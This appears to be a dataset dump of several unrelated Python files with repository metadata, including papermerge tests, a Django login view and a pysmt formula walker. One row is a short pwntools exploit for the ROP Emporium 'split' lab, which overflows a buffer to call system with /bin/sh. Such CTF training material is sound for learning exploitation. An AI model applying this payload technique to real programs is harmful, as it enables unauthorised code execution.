e0e8194b9d64628661b24aaac673852294b84581
| 69
|
py
|
Python
|
heima/login.py
|
DARKZEYE/PythonNumOne
|
2f3065537071d87e4fead4b9f0670b8a3c8b00c9
|
[
"MIT"
] | null | null | null |
heima/login.py
|
DARKZEYE/PythonNumOne
|
2f3065537071d87e4fead4b9f0670b8a3c8b00c9
|
[
"MIT"
] | null | null | null |
heima/login.py
|
DARKZEYE/PythonNumOne
|
2f3065537071d87e4fead4b9f0670b8a3c8b00c9
|
[
"MIT"
] | null | null | null |
num1 = 19
num2 = 22
num6 = 9999
num3 = 666
num4 = 878
num8 = 10000
| 7.666667
| 12
| 0.623188
| 12
| 69
| 3.583333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.510204
| 0.289855
| 69
| 8
| 13
| 8.625
| 0.367347
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
e0f1e5fc01b721e10c67732d5b3ffa29d55aad7c
| 123
|
py
|
Python
|
Labs/RopEmporium/split-64.py
|
TeamUnderdawgs/BinaryExploitaion-For-CTFs
|
78041ecee680e27d8e7d9a696a3c53b362100af7
|
[
"WTFPL"
] | 9
|
2020-03-31T05:59:08.000Z
|
2022-02-23T03:17:56.000Z
|
Labs/RopEmporium/split-64.py
|
TeamUnderdawgs/BinaryExploitaion-For-CTFs
|
78041ecee680e27d8e7d9a696a3c53b362100af7
|
[
"WTFPL"
] | null | null | null |
Labs/RopEmporium/split-64.py
|
TeamUnderdawgs/BinaryExploitaion-For-CTFs
|
78041ecee680e27d8e7d9a696a3c53b362100af7
|
[
"WTFPL"
] | 3
|
2020-05-09T11:56:40.000Z
|
2021-12-30T07:13:03.000Z
|
from pwn import *
system = p64(0x0000000000400810)
payload = " /bin/sh".ljust(40," ")
payload += system
print payload
| 12.3
| 35
| 0.682927
| 15
| 123
| 5.6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.207921
| 0.178862
| 123
| 9
| 36
| 13.666667
| 0.623762
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 0
| 0
| 0
| 0.146341
| 0
| 0
| 0
| null | null | 0
| 0.2
| null | null | 0.2
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
460223d9fd1d99e0735076a73c169b0e9e7b60e4
| 15,082
|
py
|
Python
|
papermerge/test/test_backup_restore.py
|
w-michal/papermerge
|
14703c3316deea06696da041b7adc4bd0b15270b
|
[
"Apache-2.0"
] | null | null | null |
papermerge/test/test_backup_restore.py
|
w-michal/papermerge
|
14703c3316deea06696da041b7adc4bd0b15270b
|
[
"Apache-2.0"
] | null | null | null |
papermerge/test/test_backup_restore.py
|
w-michal/papermerge
|
14703c3316deea06696da041b7adc4bd0b15270b
|
[
"Apache-2.0"
] | 1
|
2020-12-04T20:41:59.000Z
|
2020-12-04T20:41:59.000Z
|
import io
import json
import os
from pathlib import Path
import tarfile
from django.test import TestCase
from papermerge.core.models import Document, Folder
from papermerge.core.storage import default_storage
from papermerge.test.utils import create_root_user
from papermerge.core.backup_restore import (
backup_documents,
_can_restore,
restore_documents,
build_tar_archive
)
# points to papermerge.testing folder
BASE_DIR = Path(__file__).parent
class TestBackupRestore(TestCase):
def setUp(self) -> None:
self.testcase_user = create_root_user()
def test_backup_single_document(self):
document_path = os.path.join(
BASE_DIR, "data", "berlin.pdf"
)
doc = Document.objects.create_document(
user=self.testcase_user,
title='berlin.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin.pdf',
parent_id=None,
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc.path.url(),
)
with io.BytesIO() as memoryfile:
backup_documents(memoryfile, self.testcase_user)
memoryfile.seek(0)
self.assertTrue(
_can_restore(memoryfile),
'generated backup.tar is not valid'
)
memoryfile.seek(0)
backup_file = tarfile.open(fileobj=memoryfile, mode='r')
backup_json = backup_file.extractfile('backup.json')
backup_info = json.loads(backup_json.read())
self.assertIsNotNone(
backup_info.get('documents'),
'backup.json did not have a key "documents"'
)
self.assertIs(
len(backup_info.get('documents')), 1,
'backup.json key documents had more or less than one entry'
)
self.assertIs(
len(backup_file.getnames()),
2,
'backup.tar had more or less than 2 entries'
)
self.assertTrue(
f"berlin.pdf__{doc.id}" in backup_file.getnames(),
'berlin.pdf was not in the backup.tar'
)
def test_backup_document_hierachy(self):
folder_1 = Folder.objects.create(
title='1',
parent=None,
user=self.testcase_user
)
folder_2 = Folder.objects.create(
title='2',
parent=folder_1,
user=self.testcase_user
)
folder_3 = Folder.objects.create(
title='3',
parent=folder_1,
user=self.testcase_user
)
Folder.objects.create(
title='4',
parent=None,
user=self.testcase_user
)
document_path = os.path.join(
BASE_DIR, "data", "berlin.pdf"
)
doc_1 = Document.objects.create_document(
user=self.testcase_user,
title='berlin.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin.pdf',
parent_id=folder_2.id,
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_1.path.url(),
)
doc_2 = Document.objects.create_document(
user=self.testcase_user,
title='berlin.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin.pdf',
parent_id=folder_3.id,
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_2.path.url(),
)
with io.BytesIO() as memoryfile:
backup_documents(memoryfile, self.testcase_user)
memoryfile.seek(0)
self.assertTrue(
_can_restore(memoryfile),
'generated backup.tar is not valid'
)
memoryfile.seek(0)
backup_file = tarfile.open(fileobj=memoryfile, mode='r')
backup_json = backup_file.extractfile('backup.json')
backup_info = json.loads(backup_json.read())
self.assertIsNotNone(
backup_info.get('documents'),
'backup.json did not have a key "documents"'
)
self.assertIs(
len(backup_info.get('documents')), 2,
'backup.json key documents had more or less than two entry'
)
self.assertIs(
len(backup_file.getnames()),
3,
'backup.tar had more or less than 2 entries'
)
self.assertTrue(
f"1/2/berlin.pdf__{doc_1.id}" in backup_file.getnames(),
'berlin.pdf was not in the backup.tar at folder 1/2/'
)
self.assertTrue(
f"1/3/berlin.pdf__{doc_2.id}" in backup_file.getnames(),
'berlin.pdf was not in the backup.tar at folder 1/3/'
)
self.assertFalse(
'4' in backup_file.getnames(),
'Folder 4 was in backup.tar but should have been ignored'
)
def test_restore_backup(self):
restore_path = os.path.join(
BASE_DIR, "data", "testdata.tar"
)
with open(restore_path, 'rb') as restore_archive:
restore_documents(restore_archive, self.testcase_user)
folder_1 = Folder.objects.filter(title='1', parent=None).first()
self.assertIsNotNone(folder_1, 'Folder "1" was not restored')
folder_2 = Folder.objects.filter(title='2', parent=None).first()
self.assertIsNotNone(folder_2, 'Folder "2" was not restored')
folder_3 = Folder.objects.filter(title='3', parent=folder_2).first()
self.assertIsNotNone(folder_3, 'Folder "3" was not restored')
document_berlin_1 = Document.objects.filter(
title='berlin.pdf',
parent=folder_1
).first()
self.assertIsNotNone(
document_berlin_1,
'Document "berlin.pdf" in folder 1 was not restored'
)
document_berlin_3 = Document.objects.filter(
title='berlin.pdf',
parent=folder_3
).first()
self.assertIsNotNone(
document_berlin_3,
'Document "berlin.pdf" in folder 3 was not restored'
)
def test_restore_backup_documents_in_root(self):
"""
In case tar file contain documents in root (i.e. documents not
part any folder) - restore_documents function should not throw
an error (e.g. AttributeError: 'NoneType' object has no attribute 'id')
"""
restore_path = os.path.join(
BASE_DIR, "data", "one-doc-in-root-testdata.tar"
)
with open(restore_path, 'rb') as restore_archive:
# should not throw an exception
restore_documents(restore_archive, self.testcase_user)
class TestBuildTarArchive(TestCase):
"""
Test functionality which builds downloaded tar archive with
selected nodes (documents and folders)
"""
def setUp(self):
self.testcase_user = create_root_user()
def test_basic(self):
"""
Creates following hierarchy:
+ Accounting
+ Expenses
+ berlin_ex_1.pdf
+ berlin_ex_2.pdf
+ berlin_root_1.pdf
+ berlin_root_2.pdf
"""
acc = Folder.objects.create(
title='Accounting',
parent=None,
user=self.testcase_user
)
ex = Folder.objects.create(
title='Expenses',
parent=acc,
user=self.testcase_user
)
document_path = os.path.join(
BASE_DIR, "data", "berlin.pdf"
)
doc_in_root_1 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_root_1.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin_root_1.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_root_1.path.url(),
)
doc_in_root_2 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_root_2.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin_root_2.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_root_2.path.url(),
)
doc_in_ex_1 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_ex_1.pdf',
size=os.path.getsize(document_path),
lang='deu',
parent_id=ex.id,
file_name='berlin_ex_1.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_ex_1.path.url(),
)
doc_in_ex_2 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_ex_2.pdf',
size=os.path.getsize(document_path),
lang='deu',
parent_id=ex.id,
file_name='berlin_ex_2.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_ex_2.path.url(),
)
"""
User selected two documents in the root dir berlin_root_1.pdf,
and berlin_root_1.pdf and the Accounting folder.
Selection is marked with square brackets [...]
+ [Accounting]
+ Expenses
+ berlin_ex_1.pdf
+ berlin_ex_2.pdf
+ [berlin_root_1.pdf]
+ [berlin_root_2.pdf]
"""
selected_ids = [
doc_in_root_1.id, doc_in_root_2.id, acc.id
]
with io.BytesIO() as memoryfile:
build_tar_archive( # <-- THIS IS WHAT WE ARE TESTING
fileobj=memoryfile,
node_ids=selected_ids
)
memoryfile.seek(0)
archive_file = tarfile.open(fileobj=memoryfile, mode='r')
berlin_root_1_handle = archive_file.extractfile(
'berlin_root_1.pdf'
)
data = berlin_root_1_handle.read()
self.assertTrue(len(data) > 0)
berlin_ex_1_handle = archive_file.extractfile(
'Accounting/Expenses/berlin_ex_1.pdf'
)
data = berlin_ex_1_handle.read()
self.assertTrue(len(data) > 0)
with self.assertRaises(KeyError):
# there is no file Accounting/Expenses/Paris.pdf
# in archive, thus, KeyError exception is expected
archive_file.extractfile(
'Accounting/Expenses/Paris.pdf'
)
def test_basic_two_folders(self):
"""
Creates following hierarchy:
+ Folder_1
+ berlin_f_1.pdf
+ Folder_2
+ berlin_f_2.pdf
+ berlin_root_1.pdf
+ berlin_root_2.pdf
"""
f1 = Folder.objects.create(
title='Folder_1',
parent=None,
user=self.testcase_user
)
f2 = Folder.objects.create(
title='Folder_2',
parent=None,
user=self.testcase_user
)
document_path = os.path.join(
BASE_DIR, "data", "berlin.pdf"
)
doc_in_root_1 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_root_1.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin_root_1.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_root_1.path.url(),
)
doc_in_root_2 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_root_2.pdf',
size=os.path.getsize(document_path),
lang='deu',
file_name='berlin_root_2.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_root_2.path.url(),
)
doc_in_f_1 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_f_1.pdf',
size=os.path.getsize(document_path),
lang='deu',
parent_id=f1.id,
file_name='berlin_f_1.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_f_1.path.url(),
)
doc_in_f_2 = Document.objects.create_document(
user=self.testcase_user,
title='berlin_f_2.pdf',
size=os.path.getsize(document_path),
lang='deu',
parent_id=f2.id,
file_name='berlin_f_2.pdf',
page_count=3
)
default_storage.copy_doc(
src=document_path,
dst=doc_in_f_2.path.url(),
)
"""
User selected two documents in the root dir berlin_root_1.pdf,
and berlin_root_1.pdf plus Folder_1 and Folder_2.
Selection is marked with square brackets [...]
+ [Folder_1]
+ berlin_f_1.pdf
+ [Folder_2]
+ berlin_f_2.pdf
+ [berlin_root_1.pdf]
+ [berlin_root_2.pdf]
"""
selected_ids = [
doc_in_root_1.id, doc_in_root_2.id, f1.id, f2.id
]
with io.BytesIO() as memoryfile:
build_tar_archive( # <-- THIS IS WHAT WE ARE TESTING
fileobj=memoryfile,
node_ids=selected_ids
)
memoryfile.seek(0)
archive_file = tarfile.open(fileobj=memoryfile, mode='r')
berlin_root_1_handle = archive_file.extractfile(
'berlin_root_1.pdf'
)
data = berlin_root_1_handle.read()
self.assertTrue(len(data) > 0)
berlin_f_1_handle = archive_file.extractfile(
'Folder_1/berlin_f_1.pdf'
)
data = berlin_f_1_handle.read()
self.assertTrue(len(data) > 0)
berlin_f_2_handle = archive_file.extractfile(
'Folder_2/berlin_f_2.pdf'
)
data = berlin_f_2_handle.read()
self.assertTrue(len(data) > 0)
with self.assertRaises(KeyError):
# there is no file Accounting/Expenses/Paris.pdf
# in archive, thus, KeyError exception is expected
archive_file.extractfile(
'Accounting/Expenses/Paris.pdf'
)
| 31.161157
| 79
| 0.544358
| 1,698
| 15,082
| 4.58245
| 0.102474
| 0.040098
| 0.051407
| 0.048837
| 0.800925
| 0.743478
| 0.711862
| 0.682303
| 0.642334
| 0.632309
| 0
| 0.016965
| 0.362949
| 15,082
| 483
| 80
| 31.225673
| 0.792881
| 0.062392
| 0
| 0.529891
| 0
| 0
| 0.117307
| 0.016639
| 0
| 0
| 0
| 0
| 0.065217
| 1
| 0.021739
| false
| 0
| 0.027174
| 0
| 0.054348
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
460fd43bfbfd4f52f9b71e97d4290002eeb67f97
| 125
|
py
|
Python
|
src/applications/onboarding/views/sign_in.py
|
Alex-T13/sts_13_on_FastAPI
|
aab2a5b542b75230c7f0d7bdcdad292f424c638c
|
[
"MIT"
] | 3
|
2020-11-03T23:49:28.000Z
|
2020-11-13T07:25:33.000Z
|
src/applications/onboarding/views/sign_in.py
|
Alex-T13/sts_13_on_FastAPI
|
aab2a5b542b75230c7f0d7bdcdad292f424c638c
|
[
"MIT"
] | 7
|
2021-04-06T18:19:48.000Z
|
2021-09-22T19:43:54.000Z
|
src/applications/onboarding/views/sign_in.py
|
Alex-T13/sts_13_without_FastAPI
|
aab2a5b542b75230c7f0d7bdcdad292f424c638c
|
[
"MIT"
] | 1
|
2021-01-26T19:45:37.000Z
|
2021-01-26T19:45:37.000Z
|
from django.contrib.auth.views import LoginView
class SignInView(LoginView):
template_name = "onboarding/sign-in.html"
| 20.833333
| 47
| 0.784
| 16
| 125
| 6.0625
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 125
| 5
| 48
| 25
| 0.881818
| 0
| 0
| 0
| 0
| 0
| 0.184
| 0.184
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
1cec4fe2ac0c0e6d7d8cf6f0b85321ba03baa3da
| 97
|
py
|
Python
|
python/testData/completion/typedParameterStringPath/a.after.py
|
Sajaki/intellij-community
|
6748af2c40567839d11fd652ec77ba263c074aad
|
[
"Apache-2.0"
] | 1
|
2020-06-25T02:17:26.000Z
|
2020-06-25T02:17:26.000Z
|
python/testData/completion/typedParameterStringPath/a.after.py
|
Sajaki/intellij-community
|
6748af2c40567839d11fd652ec77ba263c074aad
|
[
"Apache-2.0"
] | null | null | null |
python/testData/completion/typedParameterStringPath/a.after.py
|
Sajaki/intellij-community
|
6748af2c40567839d11fd652ec77ba263c074aad
|
[
"Apache-2.0"
] | null | null | null |
from os import PathLike
def baz(akjlkgjdfsakglkd: PathLike) -> None:
pass
baz("foobar.txt")
| 16.166667
| 44
| 0.721649
| 13
| 97
| 5.384615
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164948
| 97
| 6
| 45
| 16.166667
| 0.864198
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 4
|
e816ee7e44f58de4823a25599b2d059b85af79bb
| 78
|
py
|
Python
|
test.py
|
tchristiansen-aquaveo/xmsgrid
|
800d6e759e5c95a0dff54258a5229691d4f27904
|
[
"BSD-2-Clause"
] | 2
|
2018-08-10T16:38:23.000Z
|
2019-04-26T15:06:03.000Z
|
test.py
|
tchristiansen-aquaveo/xmsgrid
|
800d6e759e5c95a0dff54258a5229691d4f27904
|
[
"BSD-2-Clause"
] | 24
|
2018-08-27T23:06:51.000Z
|
2019-05-23T14:57:14.000Z
|
test.py
|
Aquaveo/xmsstamper
|
00abfec145f9dab1867006ccdffe6e9e1a0e4caf
|
[
"BSD-2-Clause"
] | 2
|
2019-05-22T23:53:01.000Z
|
2021-04-14T21:04:55.000Z
|
# Run tests
if __name__ == '__main__':
print('Running all the tests...')
| 15.6
| 37
| 0.628205
| 10
| 78
| 4.1
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205128
| 78
| 4
| 38
| 19.5
| 0.66129
| 0.115385
| 0
| 0
| 0
| 0
| 0.477612
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 4
|
e8272542c96e6f91c1ffa6d45a735ed95377080d
| 130
|
py
|
Python
|
boot.py
|
chrisb2/environment
|
a2017c138c52731c2aacf6391b788815790dbc4c
|
[
"MIT"
] | null | null | null |
boot.py
|
chrisb2/environment
|
a2017c138c52731c2aacf6391b788815790dbc4c
|
[
"MIT"
] | null | null | null |
boot.py
|
chrisb2/environment
|
a2017c138c52731c2aacf6391b788815790dbc4c
|
[
"MIT"
] | null | null | null |
# This file is executed on every boot (including wake-boot from deepsleep)
import gc
import webrepl
gc.collect()
webrepl.start()
| 18.571429
| 74
| 0.776923
| 20
| 130
| 5.05
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146154
| 130
| 6
| 75
| 21.666667
| 0.90991
| 0.553846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
1c061ca31269cc15f5adac8170952f3062131286
| 563
|
py
|
Python
|
ethsential/src/tools/tool.py
|
1140251/Ethsential
|
1de423358f5a0ba8b84d80fa63bce09552bca9fd
|
[
"Apache-2.0"
] | 7
|
2021-10-11T12:07:08.000Z
|
2022-01-10T01:19:36.000Z
|
ethsential/src/tools/tool.py
|
1140251/Ethsential
|
1de423358f5a0ba8b84d80fa63bce09552bca9fd
|
[
"Apache-2.0"
] | null | null | null |
ethsential/src/tools/tool.py
|
1140251/Ethsential
|
1de423358f5a0ba8b84d80fa63bce09552bca9fd
|
[
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
class Tool(ABC):
@abstractmethod
def __init__(self):
pass
@abstractmethod
def parse(self, str):
pass
@property
def image(self):
raise NotImplementedError
@property
def command(self):
raise NotImplementedError
@property
def lang_supported(self):
raise NotImplementedError
def __eq__(self, other):
if type(other) is type(self) and other.image is self.image:
return self.__dict__ == other.__dict__
return False
| 19.413793
| 67
| 0.632327
| 61
| 563
| 5.557377
| 0.459016
| 0.097345
| 0.247788
| 0.212389
| 0.230089
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.296625
| 563
| 28
| 68
| 20.107143
| 0.856061
| 0
| 0
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.095238
| 0.047619
| 0
| 0.47619
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 4
|
1c08cc0040eea5fc3052bc9eb0868d9aa3025f30
| 292
|
py
|
Python
|
slurry/sections/__init__.py
|
andersea/gasio
|
cc772b2611ac96c307ebc2520471eca32974987e
|
[
"MIT"
] | null | null | null |
slurry/sections/__init__.py
|
andersea/gasio
|
cc772b2611ac96c307ebc2520471eca32974987e
|
[
"MIT"
] | null | null | null |
slurry/sections/__init__.py
|
andersea/gasio
|
cc772b2611ac96c307ebc2520471eca32974987e
|
[
"MIT"
] | null | null | null |
"""A collection of common stream operations."""
from ._buffers import Window, Group, Delay
from ._combiners import Chain, Merge, Zip, ZipLatest
from ._filters import Skip, SkipWhile, Filter, Changes, RateLimit
from ._producers import Repeat, Metronome, InsertValue
from ._refiners import Map
| 41.714286
| 65
| 0.794521
| 37
| 292
| 6.135135
| 0.783784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126712
| 292
| 6
| 66
| 48.666667
| 0.890196
| 0.140411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
1c2aaf1aee3aba725a49dd8b76f6a7262676634f
| 9,461
|
py
|
Python
|
pysmt/walkers/identitydag.py
|
keram88/pysmt
|
ecf4ea4c709df8e5f1f768820ac0f6f74803ab42
|
[
"Apache-2.0"
] | null | null | null |
pysmt/walkers/identitydag.py
|
keram88/pysmt
|
ecf4ea4c709df8e5f1f768820ac0f6f74803ab42
|
[
"Apache-2.0"
] | null | null | null |
pysmt/walkers/identitydag.py
|
keram88/pysmt
|
ecf4ea4c709df8e5f1f768820ac0f6f74803ab42
|
[
"Apache-2.0"
] | 1
|
2019-11-13T00:36:59.000Z
|
2019-11-13T00:36:59.000Z
|
#
# This file is part of pySMT.
#
# Copyright 2014 Andrea Micheli and Marco Gario
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from pysmt.walkers.dag import DagWalker
class IdentityDagWalker(DagWalker):
"""This class traverses a formula and rebuilds it recursively
identically.
This could be useful when only some nodes needs to be rewritten
but the structure of the formula has to be kept.
"""
def __init__(self, env=None, invalidate_memoization=None):
DagWalker.__init__(self,
env=env,
invalidate_memoization=invalidate_memoization)
self.mgr = self.env.formula_manager
def walk_symbol(self, formula, args, **kwargs):
return self.mgr.Symbol(formula.symbol_name(),
formula.symbol_type())
def walk_real_constant(self, formula, args, **kwargs):
return self.mgr.Real(formula.constant_value())
def walk_int_constant(self, formula, args, **kwargs):
return self.mgr.Int(formula.constant_value())
def walk_bool_constant(self, formula, args, **kwargs):
return self.mgr.Bool(formula.constant_value())
def walk_str_constant(self, formula, **kwargs):
return self.mgr.String(formula.constant_value())
def walk_and(self, formula, args, **kwargs):
return self.mgr.And(args)
def walk_or(self, formula, args, **kwargs):
return self.mgr.Or(args)
def walk_not(self, formula, args, **kwargs):
return self.mgr.Not(args[0])
def walk_iff(self, formula, args, **kwargs):
return self.mgr.Iff(args[0], args[1])
def walk_implies(self, formula, args, **kwargs):
return self.mgr.Implies(args[0], args[1])
def walk_equals(self, formula, args, **kwargs):
return self.mgr.Equals(args[0], args[1])
def walk_ite(self, formula, args, **kwargs):
return self.mgr.Ite(args[0], args[1], args[2])
def walk_le(self, formula, args, **kwargs):
return self.mgr.LE(args[0], args[1])
def walk_lt(self, formula, args, **kwargs):
return self.mgr.LT(args[0], args[1])
def walk_forall(self, formula, args, **kwargs):
qvars = [self.walk_symbol(v, args, **kwargs)
for v in formula.quantifier_vars()]
return self.mgr.ForAll(qvars, args[0])
def walk_exists(self, formula, args, **kwargs):
qvars = [self.walk_symbol(v, args, **kwargs)
for v in formula.quantifier_vars()]
return self.mgr.Exists(qvars, args[0])
def walk_plus(self, formula, args, **kwargs):
return self.mgr.Plus(args)
def walk_times(self, formula, args, **kwargs):
return self.mgr.Times(args)
def walk_pow(self, formula, args, **kwargs):
return self.mgr.Pow(args[0], args[1])
def walk_minus(self, formula, args, **kwargs):
return self.mgr.Minus(args[0], args[1])
def walk_function(self, formula, args, **kwargs):
# We re-create the symbol name
old_name = formula.function_name()
new_name = self.walk_symbol(old_name, args, **kwargs)
return self.mgr.Function(new_name, args)
def walk_toreal(self, formula, args, **kwargs):
return self.mgr.ToReal(args[0])
# Begin fixed point
def walk_fixed_constant(self, formula, **kwargs):
return self.mgr.Fixed(formula.constant_value(), formula.fixed_int_width(),
formula.fixed_man_width())
def walk_fixed_lt(self, formula, args, **kwargs):
return self.mgr.FixedLT(args[0], args[1])
def walk_fixed_le(self, formula, args, **kwargs):
return self.mgr.FixedLE(args[0], args[1])
def walk_fixed_neg(self, formula, args, **kwargs):
return self.mgr.FixedNeg(args[0])
def walk_fixed_add(self, formula, args, **kwargs):
return self.mgr.FixedAdd(args[0], args[1])
def walk_fixed_sub(self, formula, args, **kwargs):
return self.mgr.FixedSub(args[0], args[1])
def walk_fixed_mul(self, formula, args, **kwargs):
return self.mgr.FixedMul(args[0], args[1])
# End fixed point
# --- Bit-vector walkers --------------------------------------------------
# Identity-reconstruction walkers for BV nodes; binary operators take the
# two rebuilt children, unary ones take one.

def walk_bv_constant(self, formula, **kwargs):
    # Width is a property of the constant node itself, not of the children.
    return self.mgr.BV(formula.constant_value(), formula.bv_width())

def walk_bv_and(self, formula, args, **kwargs):
    return self.mgr.BVAnd(args[0], args[1])

def walk_bv_not(self, formula, args, **kwargs):
    return self.mgr.BVNot(args[0])

def walk_bv_neg(self, formula, args, **kwargs):
    return self.mgr.BVNeg(args[0])

def walk_bv_or(self, formula, args, **kwargs):
    return self.mgr.BVOr(args[0], args[1])

def walk_bv_xor(self, formula, args, **kwargs):
    return self.mgr.BVXor(args[0], args[1])

def walk_bv_add(self, formula, args, **kwargs):
    return self.mgr.BVAdd(args[0], args[1])

def walk_bv_sub(self, formula, args, **kwargs):
    return self.mgr.BVSub(args[0], args[1])

def walk_bv_mul(self, formula, args, **kwargs):
    return self.mgr.BVMul(args[0], args[1])

def walk_bv_udiv(self, formula, args, **kwargs):
    return self.mgr.BVUDiv(args[0], args[1])

def walk_bv_urem(self, formula, args, **kwargs):
    return self.mgr.BVURem(args[0], args[1])

def walk_bv_ult(self, formula, args, **kwargs):
    return self.mgr.BVULT(args[0], args[1])

def walk_bv_ule(self, formula, args, **kwargs):
    return self.mgr.BVULE(args[0], args[1])

def walk_bv_extract(self, formula, args, **kwargs):
    # Extraction bounds are node attributes, read back from the original.
    return self.mgr.BVExtract(args[0],
                              start=formula.bv_extract_start(),
                              end=formula.bv_extract_end())

def walk_bv_ror(self, formula, args, **kwargs):
    # Rotation amount is stored on the node, not as a child.
    return self.mgr.BVRor(args[0], formula.bv_rotation_step())

